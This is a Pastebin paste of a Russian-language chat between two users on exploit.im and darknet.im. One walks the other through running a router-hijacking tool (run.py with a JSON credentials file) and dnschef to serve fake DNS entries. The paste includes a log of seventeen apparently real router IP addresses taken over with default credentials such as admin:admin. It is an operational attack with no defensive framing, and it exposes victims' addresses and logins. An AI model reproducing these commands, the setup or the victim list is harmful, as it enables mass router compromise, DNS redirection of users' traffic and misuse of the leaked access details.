Advertisement
Guest User

Untitled

a guest
Jul 24th, 2016
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.76 KB | None | 0 0
  1. (19:13:30) Safe Avia: (19:17:43) 1@exploit.im: закидываем эту папку на сервак
  2. (19:17:55) 1@exploit.im: переходим в каталог
  3. (19:18:14) 1@exploit.im: cd /root/Rout
  4. (19:18:43) 1@exploit.im: ставим права на файл run.py
  5. (19:18:51) 1@exploit.im: chmod +x run.py
  6. (19:19:27) 1@exploit.im: запускаем
  7. (19:19:29) 1@exploit.im: сек
  8. (19:20:06) 1@exploit.im: nohup python run.py /root/Rout/1.json <= файл с доступами в формате json
  9. (19:20:53) 1@exploit.im: так запускаем прогу
  10. (19:21:05) 1@exploit.im: давай я сейчас тебе залью
  11. (19:21:17) 1@exploit.im: и выстовлю права
  12. (19:21:25) 1@exploit.im: останется только запустить
  13. (19:22:25) 1@exploit.im: в файле config.py выстовляеш свои днс
  14. (19:22:34) 1@exploit.im: в самом низу увидеш
  15. (19:22:45) 1@exploit.im: там их можно выстовить два
  16. (19:22:48) wonderberry@darknet.im/1215637136315163007651: давай доступ есть
  17. (19:22:49) wonderberry@darknet.im/1215637136315163007651: у тебья
  18. (19:27:14) 1@exploit.im: nohup python run.py /root/dns/Rout/1.json
  19. (19:27:29) 1@exploit.im: так в твоем случае запускать
  20. (19:27:44) 1@exploit.im: переходим в каталог перед этим
  21. (19:27:54) 1@exploit.im: в /root/dns/Rout/
  22. (19:28:29) 1@exploit.im: днс запустить
  23. (19:28:44) 1@exploit.im: в консоле в бей cd /root/dns
  24. (19:28:54) 1@exploit.im: ./dnschef.py -i 0.0.0.0 --logfile=log.txt --file=hosts.txt
  25. (19:28:57) 1@exploit.im: все
  26. (19:29:15) wonderberry@darknet.im/1215637136315163007651: и че все работает?
  27. (19:29:35) 1@exploit.im: ну hosts.txt нужные тебе фейки указываеш
  28. (19:29:41) 1@exploit.im: это в днс
  29. (19:29:48) 1@exploit.im: /root/dns
  30. (19:29:59) 1@exploit.im: в /root/dns/Rout/
  31. (19:30:16) 1@exploit.im: config.py
  32. (19:30:27) 1@exploit.im: уже прописан твой айпи днс
  33. (19:30:44) 1@exploit.im: остальное только стартануть нужно
  34. (19:31:58) 1@exploit.im: 2016-07-15 16:27:22,629 - run.py - DEBUG - 86.120.79.87 type: TP-LINK TL-WR1042ND auth: admin:admin status: Done
  35. 2016-07-15 16:27:22,629 - run.py - DEBUG - 187.19.112.13 type: TP-LINK TL-WR841N auth: admin:admin status: Done
  36. 2016-07-15 16:27:22,630 - run.py - DEBUG - 186.66.84.156 type: TP-LINK TL-WR740N auth: admin:admin status: Done
  37. 2016-07-15 16:27:22,630 - run.py - DEBUG - 130.204.70.7 type: TP-LINK TL-WR1043ND auth: admin:admin status: Done
  38. 2016-07-15 16:27:22,630 - run.py - DEBUG - 27.106.32.187 type: TP-LINK TL-WR720N auth: admin:admin status: Done
  39. 2016-07-15 16:27:22,630 - run.py - DEBUG - 94.85.113.169 type: ZyNOS ADSL (TD-W8961ND) auth: admin:resnovae status: Done
  40. 2016-07-15 16:27:22,630 - run.py - DEBUG - 77.70.117.8 type: TP-LINK TL-WR841N auth: admin:admin status: Done
  41. 2016-07-15 16:27:22,630 - run.py - DEBUG - 103.238.108.131 type: TP-LINK TL-WR841N auth: admin:admin status: Done
  42. 2016-07-15 16:27:22,631 - run.py - DEBUG - 200.6.47.72 type: TP-LINK TL-WR720N auth: admin:admin status: Done
  43. 2016-07-15 16:27:22,631 - run.py - DEBUG - 78.26.174.6 type: TP-LINK TL-WR1043ND auth: admin:admin status: Done
  44. 2016-07-15 16:27:22,631 - run.py - DEBUG - 77.70.11.230 type: TP-LINK TL-WR740N auth: admin:admin status: Done
  45. 2016-07-15 16:27:22,631 - run.py - DEBUG - 31.7.156.104 type: TP-LINK TL-WR841N auth: admin:admin status: Done
  46. 2016-07-15 16:27:22,631 - run.py - DEBUG - 143.208.220.161 type: TP-LINK TL-WR740N (access denied) auth: admin:admin status: Done
  47. 2016-07-15 16:27:22,631 - run.py - DEBUG - 78.90.104.27 type: TP-LINK TL-WR740N auth: admin:admin status: Done
  48. 2016-07-15 16:27:22,631 - run.py - DEBUG - 188.68.213.212 type: TP-LINK TL-WR741ND auth: admin:admin status: Done
  49. 2016-07-15 16:27:22,632 - run.py - DEBUG - 46.214.105.236 type: TP-LINK TL-WR740N auth: admin:admin status: Done
  50. 2016-07-15 16:27:22,632 - run.py - DEBUG - 185.54.155.195 type: TP-LINK TL-WR841N auth: admin:admin status: Done
  51. (19:32:09) 1@exploit.im: вот посмотрел логи пролива
  52. (19:32:29) 1@exploit.im: первые гуды у меня в списке тплинк
  53. (19:32:39) 1@exploit.im: как видиш уже больше одной модели
  54. (19:32:46) 1@exploit.im: TP-LINK TL-WR841N
  55. (19:32:52) 1@exploit.im: TP-LINK TL-WR740N
  56. (19:33:00) 1@exploit.im: TP-LINK TL-WR1043ND
  57. (19:33:06) 1@exploit.im: и т.д
  58. (19:33:26) wonderberry@darknet.im/1215637136315163007651: пздц ты щас уедешь чет не так хуй настроим)
  59. (19:34:27) 1@exploit.im: тут настраивать нече)
  60. (19:34:38) 1@exploit.im: врубай консоль
  61. (19:34:55) 1@exploit.im: нет лучше две сразу
  62. (19:35:02) 1@exploit.im: в одной запускаем днс
  63. (19:35:09) 1@exploit.im: в бругой пролив
  64. (19:35:14) 1@exploit.im: дргой*
  65. (19:35:24) 1@exploit.im: у меня машина уже в пути
  66. (19:35:38) 1@exploit.im: попробуем быстро все зделать
  67. (19:39:44) wonderberry@darknet.im/1215637136315163007651: не смогу щас врубить бро
  68. (19:39:47) 1@exploit.im: бро я тебе все проще зделал
  69. (19:40:06) 1@exploit.im: я тебе хистори записал
  70. (19:40:11) wonderberry@darknet.im/1215637136315163007651: бро роутер скан не выдает json формат
  71. (19:40:17) 1@exploit.im: выдвет
  72. (19:40:20) 1@exploit.im: выдает
  73. (19:40:28) 1@exploit.im: там выгрузить как
  74. (19:41:04) 1@exploit.im: вобщем в консоли просто клацаеш в верх
  75. (19:41:13) 1@exploit.im: там 4 команды записал
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement